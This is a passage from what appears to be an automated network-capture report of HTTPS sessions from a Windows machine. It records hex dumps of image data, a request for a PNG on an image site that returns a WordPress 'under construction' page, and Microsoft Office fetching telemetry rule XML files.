                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC16384INData Raw: af 9e 58 1c 9e 0f 53 d8 fa d0 a4 e4 72 7a 8e e7 d6 be 86 a0 0f 9e 30 7d 0f e4 6b d1 3c 04 08 1a ae 46 39 b2 eb ff 00 6f 75 e8 75 e7 9e 3d 24 0d 2b 07 1c de f4 ff 00 b7 4a 00 f4 3a 2b e7 8c 9f 53 f9 9a 55 27 23 93 d4 77 3e b4 00 30 39 3c 1e a7 b1 f5 a4 c1 f4 3f 91 af a1 e8 a0 0f 3c f0 10 20 6a b9 18 e6 cb af fd bd d7 a1 d7 9e 78 f4 90 34 ac 1c 73 7b d3 fe dd 2b ce f2 7d 4f e6 68 03 e8 7a f9 e5 81 c9 e0 f5 3d 8f ad 0a 4e 47 27 a8 ee 7d 6b e8 6a 00 f9 e3 07 d0 fe 46 bd 13 c0 40 81 aa e4 63 9b 2e bf f6 f7 5e 87 5e 79 e3 d2 40 d2 b0 71 cd ef 4f fb 74 a0 0f 43 a2 be 78 c9 f5 3f 99 a5 52 72 39 3d 47 73 eb 40 03 03 93 c1 ea 7b 1f 5a 4c 1f 43 f9 1a fa 1e 8a 00 f3 cf 01 02 06 ab 91 8e 6c ba ff 00 db dd 7a 1d 79 e7 8f 49 03 4a c1 c7 37 bd 3f ed d2 bc ef 27 d4 fe 66
                                                                                                                                                                                                                                                                                Data Ascii: XSrz0}k<F9ouu=$+J:+SU'#w>09<?< jx4s{+}Ohz=NG'}kjF@c.^^y@qOtCx?Rr9=Gs@{ZLClzyIJ7?'f
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC16384INData Raw: 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a fd 3c ff 00 82 54 f8 2c eb df b4 0e a9 e2 89 22 df 6f e0 cf 08 df dc ab 91 c4 77 9a b4 d0 e9 f6 ee ac 47 0e 23 6b 85 c0 e4 ab 37 41 cd 7e 61 d7 ef c7 fc 12 3b c0 e7 4f f8 6b f1 17 c7 f3 44 03 f8 8b c5 16 de 1f b2 91 97 0f f6 5d 06 c6 3b ab a6 46 c0 cc 72 5c ea 91 a1 39 23 7d b3 0e c6 80 3f 5e 94 9c 8e 4f 51 dc fa d7 d0 d5 f3 c2 f5 1f 51 fc eb e8 7a 00 2b cf 3c 7a 48 1a 56 0e 39 bd e9 ff 00 6e 95 e8 75 e7 9e 3d e9 a5 7d 6f 7f 95 a5 00 79
                                                                                                                                                                                                                                                                                Data Ascii: (((((((((((((((((((((((((((<T,"owG#k7A~a;OkD];Fr\9#}?^OQQz+<zHV9nu=}oy
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC16384INData Raw: 7a 00 2b cf 3c 7a 48 1a 56 0e 39 bd e9 ff 00 6e 95 e8 75 e7 9e 3d e9 a5 7d 6f 7f 95 a5 00 79 de 4f a9 fc cd 2a 93 91 c9 ea 3b 9f 5a 6d 2a f5 1f 51 fc e8 03 e8 7a 28 a2 80 3c f3 c7 a4 81 a5 60 e3 9b de 9f f6 e9 5e 77 93 ea 7f 33 5e 89 e3 de 9a 57 d6 f7 f9 5a 57 9d 50 03 94 9c 8e 4f 51 dc fa d7 d0 d5 f3 c2 f5 1f 51 fc eb e8 7a 00 2b cf 3c 7a 48 1a 56 0e 39 bd e9 ff 00 6e 95 e8 75 e7 9e 3d e9 a5 7d 6f 7f 95 a5 00 79 de 4f a9 fc cd 2a 93 91 c9 ea 3b 9f 5a f3 af 88 ff 00 16 3e 1d fc 23 d0 e6 f1 17 c4 4f 16 69 5e 17 d2 e1 46 65 7b e9 8b 5d 5d 32 82 7c ab 1b 08 16 6b eb e9 db 18 48 6d 6d e5 91 8f 01 7a d7 e2 37 ed 27 ff 00 05 43 f1 5f 8b 96 fb c2 df 02 6d ee bc 1b a1 4b e6 5b cb e3 0b d4 41 e2 6b d8 4e e4 66 d3 a0 06 48 b4 65 90 72 93 6e 96 f5 14 86 47 b7 97 05
                                                                                                                                                                                                                                                                                Data Ascii: z+<zHV9nu=}oyO*;Zm*Qz(<`^w3^WZWPOQQz+<zHV9nu=}oyO*;Z>#Oi^Fe{]]2|kHmmz7'C_mK[AkNfHernG
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC6971INData Raw: 6c ba ff 00 db dd 7a 1d 00 15 f3 c3 75 3f 53 fc eb e8 7a f9 e5 81 c9 e0 f5 3d 8f ad 00 36 bd 17 c0 5d 35 5f ad 97 f2 bb af 3b c1 f4 3f 91 af 44 f0 10 20 6a b9 18 e6 cb af fd bd d0 07 a1 d1 45 14 01 f3 c3 75 3f 53 fc e9 29 cc 0e 4f 07 a9 ec 7d 69 30 7d 0f e4 68 03 d1 3c 05 d3 55 fa d9 7f 2b ba f4 3a f3 cf 01 02 06 ab 91 8e 6c ba ff 00 db dd 7a 1d 00 15 f3 c3 75 3f 53 fc eb e8 7a f9 e5 81 c9 e0 f5 3d 8f ad 00 36 bd 17 c0 5d 35 5f ad 97 f2 bb af 3b c1 f4 3f 91 af 44 f0 10 20 6a b9 18 e6 cb af fd bd d0 07 a1 d1 45 14 01 f3 c3 75 3f 53 fc e9 29 cc 0e 4f 07 a9 ec 7d 69 30 7d 0f e4 68 03 d1 3c 05 d3 55 fa d9 7f 2b ba f4 3a f3 cf 01 02 06 ab 91 8e 6c ba ff 00 db dd 7a 1d 00 15 f3 c3 75 3f 53 fc eb e8 7a f9 e5 81 c9 e0 f5 3d 8f ad 00 36 bd 17 c0 5d 35 5f ad 97 f2
                                                                                                                                                                                                                                                                                Data Ascii: lzu?Sz=6]5_;?D jEu?S)O}i0}h<U+:lzu?Sz=6]5_;?D jEu?S)O}i0}h<U+:lzu?Sz=6]5_


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                26192.168.2.649757104.21.1.554433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC608OUTGET /public/uploads/preview/black-instagram-logo-png-11574831789epgjpjrwg6.png HTTP/1.1
                                                                                                                                                                                                                                                                                Host: starpng.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC832INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:56 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                Retry-After: 86400
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                CF-Cache-Status: BYPASS
                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=67efd547c5c5f9598a04a31239bda925; path=/
                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0uEApuaEmtzuivqdO%2Bc%2BVva08Cg5A3g2NMXVtweKr2PFaX9%2Fgv8iGNDVyJjaQWA87iiH6r0%2BA4L49sPUmI%2FfMZAFGqKlaGppzyMi1KZ3NIOp6k7ZwUBYeytXJDj9OA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                CF-RAY: 8ce66a402af07d05-EWR
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC537INData Raw: 37 39 37 0d 0a 0d 0a 0d 0a 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 26 72 73 71 75 6f 3b 41 71 75 69 6e 6f 27 73 20 4c 69 71 75 6f 72 20 69 73 20 75 6e 64 65 72 20 63 6f 6e 73 74 72 75 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 62 75 6e 6e 79 2e 6e 65 74 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 39 30 30 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 71 75 69 6e 6f 6c 69 71 75 6f 72 2e 63 6f 6d 2e 61
                                                                                                                                                                                                                                                                                Data Ascii: 797 <title>D&rsquo;Aquino's Liquor is under construction</title> <link rel="stylesheet" href="https://fonts.bunny.net/css?family=Roboto:400,900"> <link rel="stylesheet" href="https://daquinoliquor.com.a
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC1369INData Raw: 2f 2f 64 61 71 75 69 6e 6f 6c 69 71 75 6f 72 2e 63 6f 6d 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 6d 61 64 5f 64 65 73 69 67 6e 65 72 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 33 2e 39 37 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 71 75 69 6e 6f 6c 69 71 75 6f 72 2e 63 6f 6d 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 3f 76
                                                                                                                                                                                                                                                                                Data Ascii: //daquinoliquor.com.au/wp-content/plugins/under-construction-page/themes/mad_designer/style.css?v=3.97" type="text/css"><link rel="stylesheet" href="https://daquinoliquor.com.au/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC44INData Raw: 73 20 66 61 2d 32 78 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: s fa-2x" aria-hidden="true"></i></a></div>
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC13INData Raw: 38 0d 0a 0d 0a 20 20 0d 0a 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: 8
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                27192.168.2.64975513.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:55 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 486
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                                                x-ms-request-id: bf7deccb-401e-0064-0f0e-1754af000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144155Z-1657d5bbd48t66tjar5xuq22r8000000020g00000000k3yt
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                28192.168.2.64975213.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:55 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 407
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                                                x-ms-request-id: 789c8418-601e-0032-5905-17eebb000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144155Z-1657d5bbd48sdh4cyzadbb374800000001y000000000cyq0
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                29192.168.2.64975313.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:55 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 486
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                                                x-ms-request-id: 0a3893d3-c01e-0082-33ee-16af72000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144155Z-1657d5bbd487nf59mzf5b3gk8n00000001q000000000g1kr
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                30192.168.2.64975613.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:55 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 407
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                                                x-ms-request-id: 99ffd5e0-b01e-0053-0101-17cdf8000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144155Z-1657d5bbd48f7nlxc7n5fnfzh000000001u0000000005dkk
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                31192.168.2.64975413.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:55 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 427
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                                                x-ms-request-id: 915c1ee4-001e-0079-3000-1712e8000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144155Z-1657d5bbd48sqtlf1huhzuwq7000000001wg000000007vzq
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                32192.168.2.64975913.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
